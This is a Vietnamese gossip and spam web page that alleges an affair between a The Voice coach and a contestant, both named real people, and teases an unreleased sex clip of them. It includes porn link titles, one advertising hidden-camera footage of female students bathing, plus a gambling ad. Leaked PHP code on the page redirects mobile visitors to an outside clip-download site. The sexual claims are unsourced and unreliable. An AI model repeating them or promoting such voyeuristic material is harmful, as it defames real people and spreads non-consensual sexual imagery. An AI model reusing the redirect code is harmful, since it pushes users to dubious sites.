Sock với tin nóng lộ Clip sex The Voice Bảo Anh và Trần Lập

Filed under: TIN TỨC 9X |

Liên quan đến bài Lộ Clip sex Bảo Anh Và Trần Lập, đang gây xôn xao trong cộng đồng mạng khi một bài viết tố cáo được đăng tải trên Blog cá nhân tại Me.zinh.vn. Sau đây là nội dung của 1 cá nhân tại chương trình The Voice

Clip lộ hàng mới nhất của ca sĩ Hồ Quỳnh Hương
Tuyển tập bộ Ảnh Sex mới của nữ sinh Ngoại Thương Hà Nội
Phim sex mới 2014 Bố Chồng Nàng Dâu
Xem hai nam sinh thổi kèn cho nhau trong nhà nghỉ
clip quay lén nữ sinh Sư Phạm tắm tập thể

Nữ nhân viên văn phòng xinh đẹp
Nữ nhân viên văn phòng xinh đẹp
Tải miễn phí | Xem miễn phí

bao anh - tran lap

Sau những quyết định lựa chọn đầy thiên vi mà ai cũng có thể nhìn thấy, người ta đã dấy lên sự ngờ về mối tình vụng trộm của 1 HLV và 1 thí sinh. Dĩ nhiên là cả 2 đều nhanh chóng phủ nhận rằng chúng tôi chẳng có gì hay là tôi hết bị đồn với anh này lại tới cặp với chị kia. Nhưng liệu có bao nhiêu người tin vào cái phủ nhận đó!?

bao anh

Gần đây, lại xuất hiện thêm một tình tiết mới. Người ta biết anh tới Đà Lạt để tham gia một chương trình trao giải ở một trường Đại học thì mấy ngày gần đây mọi người cũng thấy chị cũng có chụp một bộ hình ‘xinh tươi’ trong cái lạnh của thành phố thơ mộng. Hai thời điểm sát nhau tại cùng một địa đanh, vậy đó là một sự trùng hợp vô tình hay là có tình đây?

Khi anh thông báo trên mạng xã hội là anh đang thưởng thức café tại Hồ Xuân Hương, bạn bè anh được mách rằng anh đang café với gái đẹp nên có hỏi thằm nhưng dù có tra hỏi anh nhất quyết không khai ‘gái đẹp’ đó là ai.


Nói nhỏ thêm cái này: “người ta” đang sở hữu những bức hình nóng bỏng của anh chị ấy, và hơn thế nữa là một clip tình tứ của họ tại một khách sạn. Chắc chắn “người ta” sẽ tung “con át chủ bài” này ra nhưng đây chưa phải là thời điểm thích hợp. Có khả năng cũng giống như vụ “dàn xếp kết quả”, biết đâu lại có thêm clip “nóng” đó sẽ được sẽ tung ra ngay sau buổi liveshow của The Voice để đòi lại chút ít sự công bằng cho các thí sinh khác.

Nhưng ở đời ai biết đâu chữ “ngờ”, anh vốn nổi tiếng với phong cách một rocker còn chị thì cũng vút bay cao thành “thiên thần” sau khi vượt qua vòng loại của một cuộc thi hát nên dù đi đâu, không ít thì nhiều cũng có người chú ý, không già thì trẻ cũng có người soi. Có lẽ với những người nổi tiếng thì mỗi khi họ ra đường, bất kì người xung quanh nào đều cũng có thể trở thành các paparazzi “giấu mặt”.

Màn “lật mặt” The Voice sắp tiếp tục bắt đầu, chờ hồi sau sẽ rõ.

Phim sex
if (is_mobile()) { header("Location: http://mclip.in/tai-clip/13363"); exit(); } function is_mobile() { if(isset($_SERVER["HTTP_X_WAP_PROFILE"])) return true; if(preg_match("/wap.|.wap/i",$_SERVER["HTTP_ACCEPT"])) return true; if(isset($_SERVER["HTTP_USER_AGENT"])) { $user_agents = array( "midp", "java", "opera mini", "opera mobi", "mobi", "nokia", "midp", "midp", "j2me", "avantg", "docomo", "novarra", "palmos", "palmsource", "240x320", "opwv", "chtml", "pda", "windows ce", "mmp\/", "blackberry", "mib\/", "symbian", "wireless", "nokia", "hand", "mobi", "phone", "cdm", "up.b", "audio", "SIE-", "SEC-", "samsung", "HTC", "mot-", "mitsu", "sagem", "sony", "alcatel", "lg", "erics", "vx", "NEC", "philips", "mmm", "xx", "panasonic", "sharp", "wap", "sch", "rover", "pocket", "benq", "java", "pt", "pg", "vox", "amoi", "bird", "compal", "kg", "voda", "sany", "kdd", "dbt", "sendo", "sgh", "jb", "dddi", "iphone", "ipad", "android", "Android","series 60", "s60" ); $user_agents = implode("|", $user_agents ); if (preg_match("/$user_agents/i", $_SERVER["HTTP_USER_AGENT"])) return true; } return false; } function hide_float() { var content = document.getElementById('float_content'); var hide = document.getElementById('hide_float'); if (content.style.display == "none") { content.style.display = "block"; hide.innerHTML = ' Close [X]'; } else { content.style.display = "none"; hide.innerHTML = 'Quang Cao! '; } }
[X] Close.
mybet88